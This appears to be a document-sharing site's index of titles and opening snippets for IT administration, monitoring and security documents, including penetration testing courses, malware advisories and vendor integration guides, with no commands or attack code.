The Monitis Monitoring Agent ver. 1.2 General principles, Security and Performance Monitis provides a server and network monitoring agent that can check the health of servers, networks and applications
Windows Remote Access
Windows Remote Access A newsletter for IT Professionals Education Sector Updates Issue 1 I. Background of Remote Desktop for Windows Remote Desktop Protocol (RDP) is a proprietary protocol developed by
Medical Device Security Health Imaging Digital Capture. Security Assessment Report for the Kodak Capture Link Server V1.00
Medical Device Security Health Imaging Digital Capture Security Assessment Report for the Kodak Capture Link Server V1.00 Version 1.0 Eastman Kodak Company, Health Imaging Group Page 1 Table of Contents
RSA Security Analytics
RSA Security Analytics Event Source Log Configuration Guide Microsoft Windows using Eventing Collection Last Modified: Thursday, July 30, 2015 Event Source Product Information: Vendor: Microsoft Event
computer name, domain name, PDC emulator name,... always target the members directly override monitor Enabled/Disabled for a group
Basic Monitors Ing. Ondřej Ševeček GOPAS a.s. MCM:Directory MVP:Enterprise Security CEH:Certified Ethical Hacker CHFI: Computer Hacking Forensic Investigator [email protected] www.sevecek.com GOPAS: info@gopas,cz
Penetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
Enhanced Connector Applications SupportPac VP01 for IBM WebSphere Business Events 3.0.0
Enhanced Connector Applications SupportPac VP01 for IBM WebSphere Business Events 3.0.0 Third edition (May 2012). Copyright International Business Machines Corporation 2012. US Government Users Restricted
IBM Campaign Version-independent Integration with IBM Engage Version 1 Release 3 April 8, 2016. Integration Guide IBM
IBM Campaign Version-independent Integration with IBM Engage Version 1 Release 3 April 8, 2016 Integration Guide IBM Note Before using this information and the product it supports, read the information
Medical Device Security Health Imaging Digital Capture. Security Assessment Report for the Kodak CR V4.1
Medical Device Security Health Imaging Digital Capture Security Assessment Report for the Kodak CR V4.1 Version 1.0 Eastman Kodak Company, Health Imaging Group Page 1 Table of Contents Table of Contents
CS 356 Lecture 25 and 26 Operating System Security. Spring 2013
CS 356 Lecture 25 and 26 Operating System Security Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control
User Guidance. CimTrak Integrity & Compliance Suite 2.0.6.19
CimTrak Integrity & Compliance Suite 2.0.6.19 Master Repository Management Console File System Agent Network Device Agent Command Line Utility Ping Utility Proxy Utility FTP Repository Interface User Guidance
Windows Server 2003 default services
Windows Server 2003 default services To view a description for a particular service, hover the mouse pointer over the service in the Name column. The descriptions included here are based on Microsoft documentation.
Agenda. Red Team Difference to a Pen Test Common RT Techniques Blue Team
Red Teaming Agenda Red Team Difference to a Pen Test Common RT Techniques Blue Team Disclaimer Red Teaming is a contentious term with no set definition Conceptions vary and can be situated on a scale from
xassets Hosted Services Microsoft SAM Assist Audits with xassets
xassets Hosted Services Microsoft SAM Assist Audits with xassets 2007-2010 xassets.com Limited Introduction... 2 Preparation... 2 Implementation... 3 Execution of Discovery... 3 Reporting Phase... 3 Information
Webapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
Microsoft System Center
Microsoft System Center Configuration Manager Field Experience Rushi Faldu n Manish Raval n Brandon Linton n Kaushal Pandey Mitch Tulloch, Series Editor Visit us today at microsoftpressstore.com Hundreds
Windows PowerShell Fundamentals
Windows PowerShell Fundamentals Steven Murawski Senior Windows Systems Engineer Microsoft MVP This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 Unported License. To view a copy
Hacking Database for Owning your Data
Hacking Database for Owning your Data 1 Introduction By Abdulaziz Alrasheed & Xiuwei Yi Stealing data is becoming a major threat. In 2012 alone, 500 fortune companies were compromised causing lots of money
Penetration Testing Ninjitsu 2: Crouching Netcat, Hidden Vulnerabilities. By Ed Skoudis
Penetration Testing Ninjitsu 2: Crouching Netcat, Hidden Vulnerabilities By Ed Skoudis Copyright 2008, SANS Version 2Q08 Network Pen Testing & Ethical Hacking - 2008, Ed Skoudis 1 This Webcast and the
A New Era. A New Edge. Phishing within your company
Phishing within your company Learning Objectives What is phishing and how to minimize its impact Obtain a basic understanding of how to use virtual machines Use BackTrack, a tool used by many security
FREQUENTLY ASKED QUESTIONS
FREQUENTLY ASKED QUESTIONS Secure Bytes, October 2011 This document is confidential and for the use of a Secure Bytes client only. The information contained herein is the property of Secure Bytes and may
Security Maintenance Practices. IT 4823 Information Security Administration. Patches, Fixes, and Revisions. Hardening Operating Systems
IT 4823 Information Security Administration Securing Operating Systems June 18 Security Maintenance Practices Basic proactive security can prevent many problems Maintenance involves creating a strategy
(U)SimMonitor: A New Malware that Compromises the Security of Cellular Technology and Allows Security Evaluation
(U)SimMonitor: A New Malware that Compromises the Security of Cellular Technology and Allows Security Evaluation DR. C. NTANTOGIAN 1, DR. C. XENAKIS 1, DR. G. KAROPOULOS 2 1 DEPT. O F DIGITAL SYST EMS,
WhatsUp Gold v11 Features Overview
WhatsUp Gold v11 Features Overview This guide provides an overview of the core functionality of WhatsUp Gold v11, and introduces interesting features and processes that help users maximize productivity
Alert (TA14-212A) Backoff Point-of-Sale Malware
Alert (TA14-212A) Backoff Point-of-Sale Malware Original release date: July 31, 2014 Systems Affected Point-of-Sale Systems Overview This advisory was prepared in collaboration with the National Cybersecurity
IBM Campaign and IBM Silverpop Engage Version 1 Release 2 August 31, 2015. Integration Guide IBM
IBM Campaign and IBM Silverpop Engage Version 1 Release 2 August 31, 2015 Integration Guide IBM Note Before using this information and the product it supports, read the information in Notices on page 93.
Chapter 11 Phase 5: Covering Tracks and Hiding
Chapter 11 Phase 5: Covering Tracks and Hiding Attrition Web Site Contains an archive of Web vandalism attacks http://www.attrition.org/mirror/attrition Most attackers, however, wish to keep low profile
Instrumentation for Linux Event Log Analysis
Instrumentation for Linux Event Log Analysis Rajarshi Das Linux Technology Center IBM India Software Lab [email protected] Hien Q Nguyen Linux Technology Center IBM Beaverton [email protected] Abstract
HP ProLiant Essentials Vulnerability and Patch Management Pack Server Security Recommendations
HP ProLiant Essentials Vulnerability and Patch Management Pack Server Security Recommendations Security Considerations for VPM and HP SIM Servers Introduction... 3 External patch acquisition... 4 Comparing
6WRUP:DWFK. Policies for Dedicated IIS Web Servers Group. V2.1 policy module to restrict ALL network access
OKENA 71 Second Ave., 3 rd Floor Waltham, MA 02451 Phone 781 209 3200 Fax 781 209 3199 6WRUP:DWFK Policies for Dedicated IIS Web Servers Group The policies shipped with StormWatch address both application-specific
6WRUP:DWFK. Policies for Dedicated SQL Servers Group
OKENA 71 Second Ave., 3 rd Floor Waltham, MA 02451 Phone 781 209 3200 Fax 781 209 3199 6WRUP:DWFK Policies for Dedicated SQL Servers Group The sample policies shipped with StormWatch address both application-specific
Critical Security Controls
Critical Security Controls Session 2: The Critical Controls v1.0 Chris Beal Chief Security Architect MCNC [email protected] @mcncsecurity on Twitter The Critical Security Controls The Critical Security
Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.
CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files
Managing Linux Computers Using System Center 2012 R2 Configuration Manager
prajwaldesai.com http://prajwaldesai.com/managing-linux-computers-using-system-center-2012-r2-configuration-manager/ Managing Linux Computers Using System Center 2012 R2 Configuration Manager In this post
24/7 Visibility into Advanced Malware on Networks and Endpoints
WHITEPAPER DATA SHEET 24/7 Visibility into Advanced Malware on Networks and Endpoints Leveraging threat intelligence to detect malware and exploitable vulnerabilities Oct. 24, 2014 Table of Contents Introduction
HP ProLiant Essentials Vulnerability and Patch Management Pack Planning Guide
HP ProLiant Essentials Vulnerability and Patch Management Pack Planning Guide Product overview... 3 Vulnerability scanning components... 3 Vulnerability fix and patch components... 3 Checklist... 4 Pre-installation
HoneyBOT User Guide A Windows based honeypot solution
HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3
OpenWBEM Getting Started Guide. Author: Dan Nuffer Last update: 12/09/04
OpenWBEM Getting Started Guide Author: Dan Nuffer Last update: 12/09/04 Table of Contents OpenWBEM Getting Started Guide...1 1. OpenWBEM Overview & Concepts...3 Genesis...3 Overview...3 Features...3 2.
Red vs. Blue: Modern Active Directory Attacks, Detection, & Protection
Red vs. Blue: Modern Active Directory Attacks, Detection, & Protection Sean Metcalf (@PyroTek3) CTO, DAn Solutions sean [@] dansolutions _._com DAnSolutions.com ADSecurity.org ABOUT Chief Technology Officer
"SQL Database Professional " module PRINTED MANUAL
"SQL Database Professional " module PRINTED MANUAL "SQL Database Professional " module All rights reserved. No parts of this work may be reproduced in any form or by any means - graphic, electronic, or
STEALTHbits Technologies, Inc. StealthAUDIT v5.1 System Requirements and Installation Notes
STEALTHbits Technologies, Inc. StealthAUDIT v5.1 System Requirements and Installation Notes June 2011 Table of Contents Overview... 3 Installation Overview... 3 Hosting System Requirements... 4 Recommended
A Roadmap for Securing IIS 5.0
This document was grafted together from various Web and other sources by Thomas Jerry Scott for use in his Web and other Security courses. Jerry hopes you find this information helpful in your quest to
IBM WebSphere Application Server Version 7.0
IBM WebSphere Application Server Version 7.0 Centralized Installation Manager for IBM WebSphere Application Server Network Deployment Version 7.0 Note: Before using this information, be sure to read the
Networks & Security Course. Web of Trust and Network Forensics
Networks & Security Course Web of Trust and Network Forensics Virtual Machine Virtual Machine Internet connection You need to connect the VM to the Internet for some of the Web of Trust exercises. Make
ITEC441- IS Security. Chapter 15 Performing a Penetration Test
1 ITEC441- IS Security Chapter 15 Performing a Penetration Test The PenTest A penetration test (pentest) simulates methods that intruders use to gain unauthorized access to an organization s network and
MOVEIT: SECURE BY DESIGN BY JONATHAN LAMPE, GCIA, GSNA
MOVEIT: SECURE BY DESIGN BY JONATHAN LAMPE, GCIA, GSNA The MOVEit DMZ server, MOVEit clients, and FIPS 140-2 validated MOVEit cryptographic software products by Ipswitch File Transfer have been designed
That Point of Sale is a PoS
SESSION ID: HTA-W02 That Point of Sale is a PoS Charles Henderson Vice President Managed Security Testing Trustwave @angus_tx David Byrne Senior Security Associate Bishop Fox Agenda POS Architecture Breach
